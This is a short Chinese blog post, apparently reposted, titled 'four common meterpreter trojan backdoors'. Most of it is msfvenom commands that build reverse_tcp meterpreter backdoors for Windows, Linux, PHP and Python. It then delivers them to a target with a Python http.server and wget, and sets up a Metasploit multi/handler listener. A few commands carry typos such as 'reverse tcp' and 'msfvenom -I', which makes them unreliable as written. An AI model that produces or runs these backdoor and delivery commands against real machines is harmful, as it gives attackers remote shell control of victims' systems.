美文网首页
四种常用的meterpreter木马后门

四种常用的meterpreter木马后门

作者: 孤独的一颗星 | 来源:发表于2022-08-15 23:04 被阅读0次

    msfvenom

    使用msfvenom软件生成木马后门,在目标机上执行后门,在本地机上监听上线。

    小提示:maf即是metasploit,venom即是病毒

    如果不知道msfvenom怎么用,可以msfvenom -h查看,四种生成后门的命令:

    windows可执行程序后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
    Linux可执行程序后门:msfvenom -p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
    php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
    python脚本后门:msfvenom -p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

    http.server

    在本地机上生成后门后如何传入目标机器中呢?可以通过Python的http服务:

    python3 -m http.server 8888

    注意:如果不指定端口号,默认是8000端口

    在windows中可以打开浏览器,输入:

    172.17.17.128:8888

    在linux中可使用wget获取,输入:

    wget http://172.17.17.128:8000/shell.elf

    目标机开启监听

    use exploit/multi/handler
    windows:set payload windows/x64/meterpreter/reverse_tcp,linux:set payload linux/x64/meterpreter/reverse_tcp
    set lhost 172.17.17.128
    set lport 4444

    msfvenom查看

    上面我们是针对windows来生成了一个木马后门,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:

    查看msfvenom支持的格式:msfvenom -l formats
    查看msfvenom支持的攻击载荷:msfvenom -I payloads    针对win:msfvenom -l payloads |grep windows
    查看msfvenom支持的编码:msfvenom -l encoders
    查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options

    相关文章

      网友评论

          本文标题:四种常用的meterpreter木马后门

          本文链接:https://www.haomeiwen.com/subject/erndgrtx.html